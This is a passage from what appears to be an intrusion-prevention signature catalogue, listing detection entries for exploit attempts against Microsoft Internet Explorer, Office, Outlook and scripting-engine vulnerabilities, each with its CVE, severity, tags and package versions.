Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-429-4219
Vulnerability: Microsoft-Internet-Explorer-VML-Memory-Corruption-CVE-2011-1266
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Internet Explorer
Context: Text File Stream
Severity: 10
Tags: Windows, x86, Internet Explorer, MS2006-09, CVE2006, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: HTTP-Microsoft-Internet-Explorer-VML-Rect-Fill-Method-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2012-04, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-446-4219
Vulnerability: Microsoft-Internet-Explorer-VML-Style-CVE-2012-0172
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-VML-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-02, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1589-5242
Vulnerability: Microsoft-Internet-Explorer-VML-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method

About this situation: Attempt to exploit a buffer overflow vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 5.0, Internet Explorer 6.0, MS2008-12, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-721-5211
Vulnerability: Microsoft-Internet-Explorer-WebBrowser-ActiveX-Control-Navigate-Method
Description:
Back to top

File-Text_Microsoft-Internet-Explorer-XSLT-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-08, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Internet-Explorer-XSLT-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-JScript-Scripting-Engine-Remote-Code-Execution

About this situation: An exploit against a vulnerability in Microsoft Windows detected
Context: Text File Stream
Severity: 7
Tags: Windows 2003, Windows 2000 SP4, Windows XP SP2, Windows XP 64-bit SP2, Windows Vista SP1, Windows 2008, Any Hardware, MS2009-09, CVE2009, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-JScript-Scripting-Engine-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Killbit-Disabled-ActiveX-Object

About this situation: An attempt to use disabled ActiveX object was detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2008-12, MS2009-08, MS2009-10, MS2013-11, CVE2008, CVE2009, CVE2013, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1282-5242
Vulnerability: Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
Microsoft-Killbit-Disabled-ActiveX-Object
Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
Microsoft-Killbit-Disables-ActiveX-Object-CVE-2009-2493
Microsoft-Killbit-Disables-ActiveX-Object-CVE-2013-3918
Facebook-Photo-Uploader-ActiveX-Control-Buffer-Overflow
Husdawg-System-Requirements-Lab-ActiveX-Unsafe-Method
Description:
Back to top

File-Text_Microsoft-Local-Troubleshooter-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to access vulnerabile ActiveX component
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, ActiveX, MS2003, CVE2003, Windows not specific, ActiveX not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Microsoft-Troubleshooter-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Management-Console-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in the Microsoft Management Console detected
Context: Text File Stream
Severity: 7
Tags: Windows 2000 SP4, Any Hardware, MS2006-08, CVE2006, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Microsoft-Management-Console-Cross-Site-Scripting
Description:
Back to top

File-Text_Microsoft-Media-Center-CVE-2016-0185

About this situation: A vulnerability in Microsoft Media Center
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Media Center, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-762-5211
Last changed: sgpkg-ips-762-5211
Vulnerability: Microsoft-Media-Center-CVE-2016-0185
Description:
Back to top

File-Text_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1387-5242
Vulnerability: Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft ChakraCore detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, ChakraCore, Microsoft Edge, MS2021-06, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1372-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: Microsoft-MSHTML-Platform-CVE-2021-33742-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-MsMpEng-RCE-CVE-2017-0290

About this situation: An attempt to exploit a vulnerability in Microsoft Malware Protection service detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MsMpEng, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-900-5242
Vulnerability: Microsoft-MsMpEng-RCE-CVE-2017-0290
Description:
Back to top

File-Text_Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 8.0, Internet Explorer 9.0, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-826-5242
Vulnerability: Microsoft-Multiple-Products-HTML-Sanitization-Cross-Site-Scripting
Description:
Back to top

File-Text_Microsoft-Net-Framework-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Microsoft-Net-Framework-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Microsoft-Net-Framework-Sharepoint-And-Visual-Studio-Remote-Code-Execution
Description:
Back to top

File-Text_Microsoft-Office-Access-ActiveX-Memory-Corruption-CVE-2010-0814

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Office Access ActiveX Control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2010-07, CVE2010, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Access-ActiveX-Control-Memory-Corruption-CVE-2010-0814
Description:
Back to top

File-Text_Microsoft-Office-Equation-Editor-Memory-Corruption

About this situation: A Microsoft Office Equation Editor Memory Corruption vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2017, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1029-5242
Last changed: sgpkg-ips-1029-5242
Vulnerability: Microsoft-Office-Equation-Editor-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2023-11, CVE2023, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Microsoft-Office-Excel-Fcommithtmlpivotcacheelement-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2023-06, CVE2023, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
Description:
Back to top

File-Text_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2023-06, CVE2023, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Vulnerability: Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
Description:
Back to top

File-Text_Microsoft-Office-Excel-WorksheetOptions-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, CVE2019, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Microsoft-Office-Excel-WorksheetOptions-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Office-MSODataSourceControl-ActiveX-Denial-Of-Service

About this situation: Denial of service exploit against the Microsoft Office 2003 DataSourceControl ActiveX control detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Potential Denial of Service
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-Microsoft-Office-MSODataSourceControl-ActiveX-Control-Denial-Of-Service
Description:
Back to top

File-Text_Microsoft-Office-OneNote-Url-Validation-Error

About this situation: An attempt to exploit URL validation vulnerability in Microsoft Office OneNote detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office OneNote, Microsoft Office 2003, MS2008-09, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-OneNote-Url-Validation-Error-Vulnerability
Description:
Back to top

File-Text_Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2018, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1082-5242
Last changed: sgpkg-ips-1082-5242
Vulnerability: Microsoft-Office-Outlook-CVE-2018-8161-Use-After-Free
Description:
Back to top

File-Text_Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office Outlook detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, Microsoft Office, MS2008-03, CVE2008, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Outlook-Mailto-URI-Handling-Code-Execution
Description:
Back to top

File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2016-0012

About this situation: An attempt exploit a vulnerability in Microsoft Office detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-01, CVE2016, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: Microsoft-Office-Remote-Code-Execution-CVE-2016-0012
Description:
Back to top

File-Text_Microsoft-Office-Remote-Code-Execution-CVE-2024-38021

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2024-07, CVE2024, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1750-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Microsoft-Office-Remote-Code-Execution-CVE-2024-38021
Description:
Back to top

File-Text_Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2024-10, CVE2024, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Microsoft-Office-Spoofing-Vulnerability-CVE-2024-43609
Description:
Back to top

File-Text_Microsoft-Office-URI-Scheme-Link-In-HTML

About this situation: Microsoft Office URI scheme detected
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Office, MS2024-08, CVE2024, Windows not specific, Microsoft Office not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Microsoft-Office-Spoofing-Vulnerability-CVE-2024-38200
Description:
Back to top

File-Text_Microsoft-Office-Web-Components-2-MS09-043

About this situation: Detects the use of a vulnerable OWC component
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Web-Components-2-MS09-043
Description:
Back to top

File-Text_Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136

About this situation: An attempt to exploit a vulnerability in Microsoft Office Web Components detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office Web Components, Microsoft Office 2003, MS2009-08, CVE2009, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
Description:
Back to top

File-Text_Microsoft-Office-Web-Components-Code-Execution-Exploit-MS09-043

About this situation: An exploit against a vulnerability in Microsoft Office Web Components detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office Web Components, Microsoft Office 2003, MS2009-08, CVE2009, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Web-Components-Code-Execution-CVE-2009-1136
Description:
Back to top

File-Text_Microsoft-Office-Web-Components-Datasource-Code-Execution

About this situation: An attempt to exploit a file creation vulnerability in Microsoft Web Components Control ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office Web Components, MS2008-03, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Microsoft-Office-Web-Components-Datasource-Code-Execution
Description:
Back to top

File-Text_Microsoft-Office-Web-Components-MS09-043

About this situation: Detects the use of a vulnerable OWC component
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Web-Components-MS09-043
Description:
Back to top

File-Text_Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Visual Studio .NET, Microsoft BizTalk Server, Microsoft Office, Microsoft Commerce Server, Microsoft Internet Security and Acceleration Server, MS2008-03, CVE2006, Any Operating System not specific, Microsoft Visual Studio .NET not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: Microsoft-Office-Web-Components-Url-Parsing-Buffer-Overflow
Description:
Back to top

File-Text_Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook Express detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Outlook Express, MS2004, CVE2004, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Outlook-Express-MHTML-Url-Processing-Vulnerability
Description:
Back to top

File-Text_Microsoft-Outlook-Mail-To-RCE

About this situation: Detects script code injection exploits against Outlook Client
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Microsoft Outlook, MS2004, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1413-5242
Vulnerability: Outlook-BOF-MS04-009
Description:
Back to top

File-Text_Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Exchange Server, MS2014-11, CVE2014, Windows not specific, Exchange Server not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-620-5211
Last changed: sgpkg-ips-620-5211
Vulnerability: Microsoft-Outlook-OWA-URL-Redirection-CVE-2014-6336
Description:
Back to top

File-Text_Microsoft-Outlook-RCE-CVE-2015-6123

About this situation: A vulnerability in Microsoft Outlook
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2015-11, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Microsoft-Outlook-RCE-CVE-2015-6123
Description:
Back to top

File-Text_Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Outlook, MS2024-02, CVE2024, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1693-5242
Last changed: sgpkg-ips-1708-5242
Vulnerability: Microsoft-Outlook-Remote-Code-Execution-Monikerlink-CVE-2024-21413
Description:
Back to top

File-Text_Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2005-06, CVE2005, Windows not specific, Exchange Server not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Outlook-Web-Access-Cross-Site-Scripting-Vulnerability
Description:
Back to top

File-Text_Microsoft-Outlook-Word-Object-Tag

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Microsoft-Outlook-Word-Object-Tag
Description:
Back to top

File-Text_Microsoft-PowerPoint-2003-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Powerpoint 2003 detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint 2003, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Vulnerability: Microsoft-PowerPoint-2003-Heap-Overflow
Description:
Back to top

File-Text_Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Microsoft Remote Desktop Connection Manager detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Remote Desktop Connection Manager, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1233-5242
Vulnerability: Microsoft-Remote-Desktop-Connection-Manager-Xml-External-Entity-Injection
Description:
Back to top

File-Text_Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044

About this situation: An attempt to exploit RDP vulnerability via ActiveX detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2016-05, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-1241-5242
Vulnerability: Microsoft-Scripting-Engine-CVE-2016-0189-Memory-Corruption
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-02, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0834
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-02, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0835
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-02, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0837
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-02, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0838
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-02, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0840
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858

About this situation: An attempt to exploit a vulnerability in ChakraCore detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, ChakraCore, MS2018-02, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0858
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-02, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1043-5242
Last changed: sgpkg-ips-1043-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-0860
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229

About this situation: An attempt to exploit a vulnerability in Chakra scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-06, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8229
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266

About this situation: An attempt to exploit a vulnerability in Chakra scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8266
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353

About this situation: An attempt to exploit a vulnerability in Microsoft scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 11.0, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8353
Description:
Back to top

File-Text_Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355

About this situation: An attempt to exploit a vulnerability in Chakra scripting engine detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-08, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Microsoft-Scripting-Engine-Memory-Corruption-CVE-2018-8355
Description:
Back to top

